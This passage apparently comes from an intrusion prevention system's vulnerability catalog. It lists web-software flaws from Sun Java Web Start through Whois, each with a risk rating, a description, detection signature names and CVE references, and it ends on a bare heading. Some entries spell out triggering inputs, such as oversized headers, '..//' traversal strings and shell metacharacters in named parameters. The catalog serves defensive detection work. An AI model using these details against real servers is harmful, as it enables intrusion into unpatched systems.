Description: There is a buffer overflow vulnerability in Sun Java Web Start. A remote attacker can exploit this vulnerability by persuading a user to open a malicious JNLP file with an excessively long encoding attribute value in the XML header. Successful exploitation could allow the attacker to execute arbitrary code with the privileges of the currently logged on user.
Situation: HTTP_SS-Sun-Java-Web-Start-Charset-Encoding-Stack-Buffer-Overflow
File-TextId_Sun-Java-Web-Start-Charset-Encoding-Stack-Buffer-Overflow
References:
CVE-2008-1188
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1188
BID-28083
http://www.securityfocus.com/bid/28083
OSVDB-42594
http://www.osvdb.org/42594
Back to top

HTTP-Sun-Java-WebStart-Jnlp-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Sun Java Runtime Environment
Risk: High
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Sun Java Runtime Environment
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Sun Java Runtime Environment. By persuading a user to visit a malicious web page, a remote attacker can execute non-privileged arbitrary code.
Situation: HTTP_SS-Sun-Java-WebStart-Jnlp-Buffer-Overflow
File-TextId_Sun-Java-WebStart-Jnlp-Buffer-Overflow
References:
CVE-2007-3655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3655
BID-24832
http://www.securityfocus.com/bid/24832
OSVDB-37756
http://www.osvdb.org/37756
Back to top

HTTP-SUSE-Apache-Cgi-Source-Disclosure

About this vulnerability: SUSE Apache http server cgi source code disclosure
Risk: Low
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: SUSE Linux 6
Software: Apache
Type: Insecure Configuration
Description: The Apache http server installed by default on SUSE Linux (6.3, 6.4) could allow remote users to view cgi script sources. This is due to a default configuration that sets /cgi-bin-sdb/ as an alias for /cgi-bin/. Requests to /cgi-bin-sdb/ returns the script sources instead of executing them.
Situation: HTTP_CSU-SUSE-Apache-Cgi-Source-Disclosure
References:
CVE-2000-0868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0868
BID-1658
http://www.securityfocus.com/bid/1658
Back to top

HTTP-SUSE-Linux-Enterprise-Server-Remote-Manager-Content-Length-BOF

About this vulnerability: Novell SUSE Linux Enterprise Server Remote Manager HTTP content-length buffer overflow
Risk: Critical
First detected in: sgpkg-ips-55-1210
Last changed: sgpkg-ips-1584-5242
Platform: SUSE Linux
Software: Novell Open Enterprise Server
Type: Buffer Overflow
Description: Novell SUSE Linux Enterprise Server Remote Manager suffers from a buffer overflow vulnerability in the processing of HTTP requests. Unauthenticated remote attackers can send an HTTP request containing a negative Content-Length header to the Remote Manager software, causing a heap-based buffer overflow. A successful exploit allows arbitrary remote code execution with the software's privileges (root by default).
Situation: HTTP_CSH-Invalid-Negative-Content-Length-Value
References:
CVE-2005-3655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3655
BID-16226
http://www.securityfocus.com/bid/16226
OSVDB-22455
http://www.osvdb.org/22455
Back to top

HTTP-Sybase-EAServer-WebConsole-Buffer-Overflow

About this vulnerability: Sybase EAServer buffer overflow vulnerability
Risk: High
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sybase Enterprise Application Server
Type: Buffer Overflow
Description: Sybase Enterprise Application Server has a buffer overflow vulnerability concerning the handling of HTTP requests. If the request line of an HTTP request contains an excessively long request URI, the allocated stack buffer is overrun causing a DoS condition or allowing arbitrary code execution with the privileges of the jagsrv.exe process.
Situation: HTTP_CSU-Sybase-EAServer-WebConsole-Buffer-Overflow
References:
CVE-2005-2297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2297
BID-14287
http://www.securityfocus.com/bid/14287
OSVDB-17995
http://www.osvdb.org/17995
Back to top

HTTP-Symantec-Backup-Exec-For-Windows-Server-Scheduler-ActiveX-Control-BOF

About this vulnerability: Buffer overflow vulnerability in the Symantec Backup Exec for Windows Servers
Risk: Moderate
First detected in: sgpkg-ips-148-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec Backup Exec for Windows Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Symantec Backup Exec for Windows Servers. By persuading a user to view a malicious web page, a remote attacker can execute arbitrary code with the privileges of the currently logged on user.
Situation: HTTP_SS-Symantec-Backup-Exec-For-Windows-Server-Scheduler-ActiveX-Control-BOF
File-Text_Symantec-Backup-Exec-For-Windows-Server-Scheduler-ActiveX-Control-BOF
References:
CVE-2007-6016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6016
BID-26904
http://www.securityfocus.com/bid/26904
Back to top

HTTP-Symantec-Products-ActiveX-Control-NavComUI.dll-Code-Execution

About this vulnerability: Symantec NavComUI.dll library has two code execution vulnerabilities
Risk: High
First detected in: sgpkg-ips-117-2032
Last changed: sgpkg-ips-1734-5242
Platform: Windows
Software: Symantec Norton AntiVirus; Symantec Norton Internet Security; Symantec Norton System Works
Type: Malfunction
Description: Symantec NavComUI.dll library has two code execution vulnerabilities in AxSysListView32 and AxSysListView32OAA ActiveX controls due to insufficient input validation. A remote attacker can exploit these vulnerabilities by enticing a user to visit a crafted web site, which allows the attacker to execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-Symantec-Products-ActiveX-Control-NavComUI.dll-Code-Execution
HTTP_SS-Symantec-Products-ActiveX-Control-NavComUI.dll-Possible-Code-Execution
File-Text_Symantec-Products-ActiveX-Control-NavComUI.dll-Possible-Code-Execution
References:
CVE-2007-2955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2955
BID-24983
http://www.securityfocus.com/bid/24983
Back to top

HTTP-Symantec-Sygate-Management-Server-Authentication-Servlet-SQL-Injection

About this vulnerability: Symantec Sygate Management Server Authentication servlet SQL injection vulnerability
Risk: Moderate
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sygate Management Server
Type: SQL Injection
Description: Symantec Sygate Management Server suffers from an SQL injection vulnerability, which allows unauthenticated remote attackers to execute arbitrary database queries via HTTP requests. The issue allows the overwriting of arbitrary passwords, including the administrator password, leading to a complete compromise of the system.
Situation: HTTP_CRL-Symantec-Sygate-Management-Server-Authentication-Servlet-SQL-Injection
References:
CVE-2006-0522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0522
BID-16452
http://www.securityfocus.com/bid/16452
OSVDB-22883
http://www.osvdb.org/22883
Back to top

HTTP-Test-Cgi-Directory-Disclosure

About this vulnerability: Vulnerable test scripts included in NCSA HTTPd and Apache
Risk: Low
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NCSA HTTPd; Apache
Type: Metacharacter Injection
Description: Due to improperly quoted "echo" command in the test-cgi and nph-test-cgi sample shell scripts included in NCSA HTTPd as well as Apache, an attacker can obtain a directory listing of a directory the webserver process has access to.
Situation: HTTP_CRL-Test-Cgi-Directory-Disclosure
References:
CVE-1999-0070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0070
BID-2003
http://www.securityfocus.com/bid/2003
Back to top

HTTP-TikiWiki-Jhot.php-Script-File-Upload-Security-Bypass

About this vulnerability: Script code file upload and execution vulnerability in TikiWiki
Risk: High
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TikiWiki
Type: Malfunction
Description: There is a script code file upload and execution vulnerability in TikiWiki. A remote attacker can compromise the target server running the vulnerable web application by uploading a malicious script file to the server and then executing it via HTTP GET request.
Situation: HTTP_CS-TikiWiki-Jhot.php-Script-File-Upload-Security-Bypass
References:
CVE-2006-4602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4602
BID-19819
http://www.securityfocus.com/bid/19819
OSVDB-28456
http://www.osvdb.org/28456
Back to top

HTTP-TRACE-Method-HTTP-Header-Information-Disclosure

About this vulnerability: An HTTP TRACE Method HTTP Header Information Disclosure vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP server
Type: Configuration Error
Description: A vulnerability in multiple web servers, for example Solaris Management Console and IBM WebSphere Application Server, when the TRACE method is enabled, allows remote attackers to gain sensitive information such as cookies and authentication data from HTTP headers.
Situation: HTTP_CS-TRACE-Request
References:
CVE-2005-3398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3398
BID-11604
http://www.securityfocus.com/bid/11604
OSVDB-877
http://www.osvdb.org/877
Back to top

HTTP-Trend-Micro-Control-Manager-Chunked-Encoding-Buffer-Overflow

About this vulnerability: Trend Micro Control Manager HTTP chunked encoding vulnerability
Risk: High
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trend Micro Control Manager
Type: Buffer Overflow
Description: Trend Micro Control Manager suffers from a buffer overflow in the handling of HTTP chunked encoding requests. The software allocates a small buffer for storing chunked encoding data without verifying the actual size of incoming data. A single large chunk or multiple small chunks can overflow the buffer, allowing remote attackers to execute arbitrary code on the system.
Situation: HTTP_CSH-Trend-Micro-Control-Manager-Chunked-Encoding-Buffer-Overflow
References:
CVE-2005-1929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1929
BID-15865
http://www.securityfocus.com/bid/15865
OSVDB-21772
http://www.osvdb.org/21772
OSVDB-21771
http://www.osvdb.org/21771
Back to top

HTTP-Trend-Micro-OfficeScan-Atxconsole-ActiveX-Control-Format-String

About this vulnerability: Format string overflow vulnerability in Trend Micro OfficeScan
Risk: Low
First detected in: sgpkg-ips-82-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro OfficeScan Corporate Edition
Type: Format String
Description: Trend Micro OfficeScan has a format string vulnerability. By successfully exploiting this vulnerability, a remote attacker can cause a DoS or execute arbitrary non-privileged code on the victim's computer.
Situation: HTTP8080_Trend-Micro-OfficeScan-Atxconsole-ActiveX-Control-Format-String
File-Text_Trend-Micro-OfficeScan-Atxconsole-ActiveX-Control-Format-String
References:
CVE-2006-5157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5157
BID-20284
http://www.securityfocus.com/bid/20284
Back to top

HTTP-Trend-Micro-OfficeScan-Cgi-Password-Decryption-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Trend Micro OfficeScan Policy server
Risk: Moderate
First detected in: sgpkg-ips-147-2032
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: Trend Micro OfficeScan Corporate Edition
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Trend Micro OfficeScan Policy server. An unauthenticated attacker can exploit this vulnerability to compromise the vulnerable system.
Situation: HTTP_CRL-Trend-Micro-OfficeScan-Cgi-Password-Decryption-Buffer-Overflow
References:
BID-28002
http://www.securityfocus.com/bid/28002
Back to top

HTTP-Trend-Micro-OfficeScan-Multiple-Cgi-Modules-Form-Processing-BOF

About this vulnerability: Trend Micro Control Manager HTTP Form Processing buffer overflow vulnerability
Risk: High
First detected in: sgpkg-ips-181-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trend Micro OfficeScan
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Trend Micro's OfficeScan. The flaw is due to a boundary error when handling HTTP requests. An unauthenticated remote attacker can leverage this vulnerability to inject and execute arbitrary code with System level privileges on the target system. Vulnerable applications are Trend Micro OfficeScan 7.x Prior to 7.3 Build 1374 and Trend Micro OfficeScan 8.x Prior to 8.0 SP1 Patch 1.
Situation: HTTP_CS-Trend-Micro-OfficeScan-Cgi-Module-Multipart-BOF
References:
CVE-2008-3862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3862
BID-31859
http://www.securityfocus.com/bid/31859
Back to top

HTTP-TWiki-Configure-Script-TYPEOF-Parameter-Perl-Code-Execution

About this vulnerability: Perl code execution vulnerability in the configure script in TWiki
Risk: Low
First detected in: sgpkg-ips-76-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TWiki
Type: Code Injection
Description: There is a Perl code execution vulnerability in the configure script in TWiki due to insufficient input validation of the TYPEOF parameter. By exploiting this vulnerability a remote attacker can execute arbitrary Perl code on the target host not configured properly with the privileges of the web server.
Situation: HTTP_CSU-TWiki-Configure-Script-TYPEOF-Parameter-Command-Execution-2
HTTP_CRL-TWiki-Configure-Script-TYPEOF-Parameter-Perl-Code-Execution
References:
CVE-2006-3819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3819
BID-19188
http://www.securityfocus.com/bid/19188
OSVDB-27556
http://www.osvdb.org/27556
Back to top

HTTP-TWiki-Rev-Parameter-Command-Execution

About this vulnerability: TWiki allows arbitrary command execution via 'rev' parameter
Risk: High
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TWiki
Type: Malfunction
Description: TWiki, an enterprise collaboration platform, is vulnerable to arbitrary command execution. User input to the 'rev' parameter is not properly sanitized, allowing remote attackers to execute arbitrary code by sending a specially-crafted parameter to 'rev'. Commands will be executed with the permissions of the web server.
Situation: HTTP_CRL-TWiki-Rev-Parameter-Command-Execution
References:
CVE-2005-2877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2877
BID-14834
http://www.securityfocus.com/bid/14834
Back to top

HTTP-VBulletin-Forum-Calendar-SQL-Injection

About this vulnerability: VBulletin Forum's calendar is vulnerable to SQL injection
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: vBulletin
Type: SQL Injection
Description: Calendar.php in VBulletin Forum versions 2.3.xx and earlier are vulnerable to SQL injection. Remote attackers can exploit the vulnerability to modify database queries made by the software.
Situation: HTTP_CRL-VBulletin-Forum-Calendar-SQL-Injection
References:
CVE-2004-0036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0036
BID-9360
http://www.securityfocus.com/bid/9360
OSVDB-3344
http://www.osvdb.org/3344
Back to top

HTTP-VBulletin-Impex-Systempath-Code-Execution

About this vulnerability: vBulletin ImpEx system code execution vulnerability
Risk: Moderate
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: vBulletin
Type: Malfunction
Description: vBulletin ImpEx (Import / Export) system has a remote file inclusion vulnerability. ImpExData.php uses the variable systempath to include a PHP file without initializing it first. If PHP's register_globals is disabled, remote attackers can specify an URL they control as the systempath, which can be used to force vBulletin into executing the attacker's code.
Situation: HTTP_CRL-VBulletin-Impex-Systempath-Code-Execution
References:
CVE-2006-1382
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1382
BID-17206
http://www.securityfocus.com/bid/17206
OSVDB-24070
http://www.osvdb.org/24070
Back to top

HTTP-Verity-Ultraseek-Search-Path-Disclosure

About this vulnerability: Verity's Ultraseek displays the server's document root in an error message
Risk: Low
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Verity Ultraseek
Type: Malfunction
Description: Verity's Ultraseek suffers from a path disclosure vulnerability. If a MS-DOS device name is encountered in the search option, the full path to the server's document root is given in an error message.
Situation: HTTP_CRL-Verity-Ultraseek-Search-Path-Disclosure
References:
CVE-2004-0050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0050
BID-10275
http://www.securityfocus.com/bid/10275
Back to top

HTTP-Vibechild-Directory-Manager-Edit-Image-Php-Vulnerability

About this vulnerability: Vibechild Directory Manager edit_image.php Vulnerability
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: PHP
Type: Metacharacter
Description: Vulnerabilitity in Vibechild Directory Manager before 0.91 allows remote attackers to execute arbitrary commands via edit_image.php script.
References:
CVE-2001-1020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1020
BID-3288
http://www.securityfocus.com/bid/3288
Back to top

HTTP-Viralator-Code-Execution

About this vulnerability: Code execution vulnerability in Viralator
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Viralator
Type: Malfunction
Description: Viralator has a vulnerability in the way it handles URLs. An attacker is able to include arbitrary code in the URL, which is then executed on the server running Viralator.
References:
CVE-2001-0849
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0849
BID-3495
http://www.securityfocus.com/bid/3495
Back to top

HTTP-ViRobot-Server-Addschup-Cookie-Buffer-Overflow

About this vulnerability: ViRobot server addschup binary buffer overflow vulnerability
Risk: High
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: ViRobot
Type: Buffer Overflow
Description: ViRobot Server is an anti-virus software that has a web-based control interface, which suffers from a buffer overflow vulnerability in the handling of cookies. A cookie containing a ViRobot_ID of over 32 bytes will cause a buffer overflow, leaking the ID into a variable used in the root's crontab entry. This allows remote attackers to execute arbitrary commands on the server as root by sending a HTTP request with a crafted cookie.
Situation: HTTP_CS-ViRobot-Server-Addschup-Cookie-Buffer-Overflow
References:
CVE-2005-2041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2041
BID-12964
http://www.securityfocus.com/bid/12964
OSVDB-17320
http://www.osvdb.org/17320
Back to top

HTTP-Virtual-Vision-FTP-Pl-Directory-Traversal

About this vulnerability: Virtual Vision FTP Pl Directory Traversal
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: Virtual Vision FTP Browser
Type: Directory Traversal
Description: Virtual vision contains a directory traversal vulnerability which when successfully exploited reveals the contents of a directory.
References:
CVE-2000-0674
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0674
BID-1471
http://www.securityfocus.com/bid/1471
Back to top

HTTP-VitalSuite-System-Compromise

About this vulnerability: Access to vitalsuite by guessing a correct username
Risk: Moderate
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT; Windows 2000
Software: Lucent VitalSuite
Type: Malfunction
Description: Lucent VitalSuite uses cookies for authentication, but a flaw in the system allows remote attackers to gain access to the server by guessing a correct username.
Situation: HTTP_CRL-VitalSuite-System-Compromise
References:
CVE-2002-0236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0236
BID-3784
http://www.securityfocus.com/bid/3784
Back to top

HTTP-W3who-DLL-Long-Query-BOF

About this vulnerability: Microsoft's W3who.dll buffer overflow vulnerability
Risk: High
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP
Software: Microsoft Windows Resource Kit
Type: Buffer Overflow
Description: Microsoft's W3Who ISAPI w3who.dll has a buffer-overflow vulnerability that can be exploited by sending a long parameter to the dll. The vulnerability may allow arbitrary code execution.
Situation: HTTP_CRL-W3who-DLL-Long-Query-BOF
References:
CVE-2004-1134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1134
BID-11820
http://www.securityfocus.com/bid/11820
Back to top

HTTP-Watchfire-Appscan-401-Response-Realm-Buffer-Overflow

About this vulnerability: Watchfire Appscan can be exploited to execute arbitrary code with a malicious HTTP 401 response
Risk: Moderate
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Watchfire Appscan
Type: Buffer Overflow
Description: Watchfire Appscan is an automated web application testing tool. Due to insufficient input validation, it is possible to overflow a buffer in the application by sending a specially crafted HTTP response. A HTTP 401 response with a Realm field consisting of more than 350 characters will cause a buffer overflow when parsed by Watchfire Appscan, eventually leading to arbitrary code execution. A successful exploit requires that the attacker sets up a malicious http server that is scanned with a vulnerable version of the software.
Situation: HTTP_SS-Watchfire-Appscan-401-Response-Realm-Buffer-Overflow
HTTP_SHS-Watchfire-Appscan-401-Response-Realm-Buffer-Overflow
References:
CVE-2005-4270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4270
BID-15873
http://www.securityfocus.com/bid/15873
Back to top

HTTP-Web-Pals-Cgi-Vulnerability

About this vulnerability: WebPals CGI script directory traversal and system compromise
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: WebPALS
Type: Directory Traversal
Description: The WebPals CGI script allows remote access to files and execution of commands. Depending on the Web server's configuration, this may allow a complete system compromise.
References:
CVE-2001-0217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0217
BID-2372
http://www.securityfocus.com/bid/2372
Back to top

HTTP-Webactive-Log-Information-Disclosure

About this vulnerability: Log file disclosure in WEBactive server 1.0
Risk: Low
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1637-5242
Platform: Windows 95; Windows 98; Windows NT 4.0; Windows 2000
Software: ITAfrica WEBactive
Type: Insecure Configuration
Description: WebActive web server stores the web-access log active.log as a default in the document root. This allows remote attackers to view the logs by requesting active.log.
References:
CVE-2000-0642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0642
BID-1497
http://www.securityfocus.com/bid/1497
Back to top

HTTP-Webalizer-Cross-Site

About this vulnerability: Cross-site vulnerability in Webalizer
Risk: Moderate
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Webalizer
Type: Malfunction
Description: Webalizer analyses web server log files and produces HTML reports. Two vulnerabilities allow remote attackers to run scripts in the security context of the site. If the attacker's address resolves to a hostname containing HTML-tags, they will be inserted unmodified into the generated reports. Attackers can also send a 'referer' http header containing HTML tags that will be inserted into the generated reports.
Situation: HTTP_CSH-Referer-XSS
References:
CVE-2001-0835
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0835
BID-3473
http://www.securityfocus.com/bid/3473
Back to top

HTTP-WebAPP-Apage-Command-Execution

About this vulnerability: Command execution vulnerability in WebAPP apage.cgi
Risk: Moderate
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WebAPP
Type: Malfunction
Description: WebAPP is a web portal system. WebAPP 'apage.cgi' has a vulnerability in the handling of the user supplied data. Remote attackers can execute arbitrary commands using shell metacharacters via the 'f' parameter.
Situation: HTTP_CSU-WebAPP-Apage-Command-Execution
References:
CVE-2005-1628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1628
BID-13637
http://www.securityfocus.com/bid/13637
Back to top

HTTP-Webcart-File-Disclosure

About this vulnerability: Webcart File Disclosure
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: Webcart
Type: Configuration Error
Description: The webcart application can be misconfigured to reveal any file on the system.
References:
CVE-1999-0610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0610
Back to top

HTTP-WebConnect-Wcp-User-Directory-Traversal

About this vulnerability: WebConnect directory traversal using the WCP_USER parameter
Risk: Moderate
First detected in: sgpkg-ips-23-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WebConnect
Type: Buffer Overflow
Description: WebConnect 6.4.4 and 6.5 have a directory traversal vulnerability in the handling of WCP_USER parameter. The vulnerability can be exploited by setting the parms parameter to 'default' and including directory traversal sequences (..//) to the WCP_USER parameter. This allows remote attackers to view arbitrary files from the server.
Situation: HTTP_CSU-WebConnect-Wcp-User-Directory-Traversal
References:
CVE-2004-0465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0465
BID-12613
http://www.securityfocus.com/bid/12613
Back to top

HTTP-Webgais-Cgi-System-Compromise

About this vulnerability: System command in webgais allows command execution
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WebGAIS
Type: Metacharacter Injection
Description: The webgais script provides a web interface to the gais search engine. A system command in the script can be exploited to execute arbitrary commands by including shell metacharacters in the query.
Situation: HTTP_CRL-Webgais-Cgi-System-Compromise
References:
CVE-1999-0176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0176
BID-2058
http://www.securityfocus.com/bid/2058
Back to top

HTTP-WebHints-Command-Execution

About this vulnerability: Command execution vulnerability in WebHints
Risk: Moderate
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WebHints
Type: Metacharacter
Description: WebHints allows you to set up a "Hint (Quote/Tip/Joke) of the Day" page. Script hints.pl in WebHints contains a vulnerability in the argument handling. Remote attackers can exploit this vulnerability to execute arbitrary commands via shell metacharacters.
Situation: HTTP_CSU-WebHints-Command-Execution
References:
CVE-2005-1950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1950
BID-13930
http://www.securityfocus.com/bid/13930
Back to top

HTTP-Websendmail-Cgi-System-Compromise

About this vulnerability: Websendmail.cgi command execution vulnerability
Risk: High
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WebGAIS
Type: Malfunction
Description: Websendmail, a cgi script that comes with the WEBgais package, does not validate input sent as the receiver argument. Remote attackers may execute arbitrary commands as the web server by passing suitable arguments to the script.
Situation: HTTP_CRL-Websendmail-Cgi-System-Compromise
References:
CVE-1999-0196
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0196
BID-2063
http://www.securityfocus.com/bid/2063
OSVDB-237
http://www.osvdb.org/237
Back to top

HTTP-Website-Uploader-Exe-File-Import

About this vulnerability: Uploader.exe allows arbitrary file uploading in WebSite.
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: O'Reilly Software WebSite
Type: Malfunction
Description: Uploader.exe included with the O'Reilly Website does not check any input. This allows remote user to upload any file to cgi-win directory of the host, and can be exploited by uploading and executing malicious scripts on the host.
Situation: HTTP_CSU-Website-Uploader-Exe-File-Import
References:
CVE-1999-0177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0177
Back to top

HTTP-Website-Win-C-Sample-Exe-BOF

About this vulnerability: Buffer overflow in sample win-c-sample.exe
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: O'Reilly Software WebSite
Type: Buffer Overflow
Description: A buffer-overflow vulnerability exists in a sample script from WebSite, win-c-sample.exe. Exploiting the vulnerability allows arbitrary command execution as the server process on the host.
Situation: HTTP_CSU-Website-Win-C-Sample-Exe-BOF
References:
CVE-1999-0178
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0178
BID-2078
http://www.securityfocus.com/bid/2078
OSVDB-8
http://www.osvdb.org/8
Back to top

HTTP-WebsitePro-Path-Disclosure

About this vulnerability: Web document-path disclosure.
Risk: Low
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: O'Reilly Software WebSite
Type: Malfunction
Description: An attacker can disclose the exact path of a web document by issuing a crafted request.
Situation: HTTP_CS-WebsitePro-Path-Disclosure
References:
CVE-2000-0066
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0066
BID-932
http://www.securityfocus.com/bid/932
Back to top

HTTP-Webstore-Ws-Mail-Cgi-System-Compromise

About this vulnerability: System-compromising vulnerability in ws_mail.cgi
Risk: High
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: cgiCentral WebStore 400
Type: Malfunction
Description: Webstore 400 is an online shopping-cart application. Webstore includes the cgi script ws_mail.cgi, which does not sufficiently validate input. Remote attackers may execute arbitrary commands on the server by passing suitable arguments to the scripts kill - parameter. Administrator privileges in Webstore are required to use ws_mail.cgi.
Situation: HTTP_CRL-Webstore-Ws-Mail-Cgi-System-Compromise
References:
CVE-2001-1343
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1343
BID-2861
http://www.securityfocus.com/bid/2861
Back to top

HTTP-Wguest-Rguest-Exe-File-Disclosure

About this vulnerability: File-disclosure vulnerability in both rguest.exe and wguest.exe
Risk: Low
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Webcom Datakommunikation Guestbook
Type: Metacharacter Injection
Description: The Webcom Datakommunikation Guestbook 0.1 comes with two vulnerable files, wguest.exe and rguest.exe. Both allow remote users to view arbitrary files from the host, and can be exploited by a path and filename as the parameter.
References:
CVE-1999-0467
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0467
BID-2024
http://www.securityfocus.com/bid/2024
Back to top

HTTP-Whisker-Vulnerability-Scanner

About this vulnerability: Whisker Vulnerability Scanner
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP server
Type: Malfunction
Description: A possible attacker can use Whisker (a vulnerability scanner) to scan known CGI vulnerabilities in web servers.
Situation: HTTP_CS-Whisker-Scan-Detect
HTTP_CSH-LibWhisker-Nikto-Scan-Detect
Back to top

HTTP-Whois-Raw-Cgi-System-Compromise

About this vulnerability: Insufficient-argument parsing in whois_raw.cgi.
Risk: High
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CDomain CDomainfree
Type: Malfunction
Description: A vulnerability in CDomainfrees whois_raw.cgi allows remote attackers to execute arbitrary commands on the server by passing suitable arguments to the fqdn parameter.
Situation: HTTP_CRL-Whois-Raw-Cgi-System-Compromise
References:
CVE-1999-1063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1063
BID-304
http://www.securityfocus.com/bid/304
Back to top

HTTP-Windmail-File-Disclosure

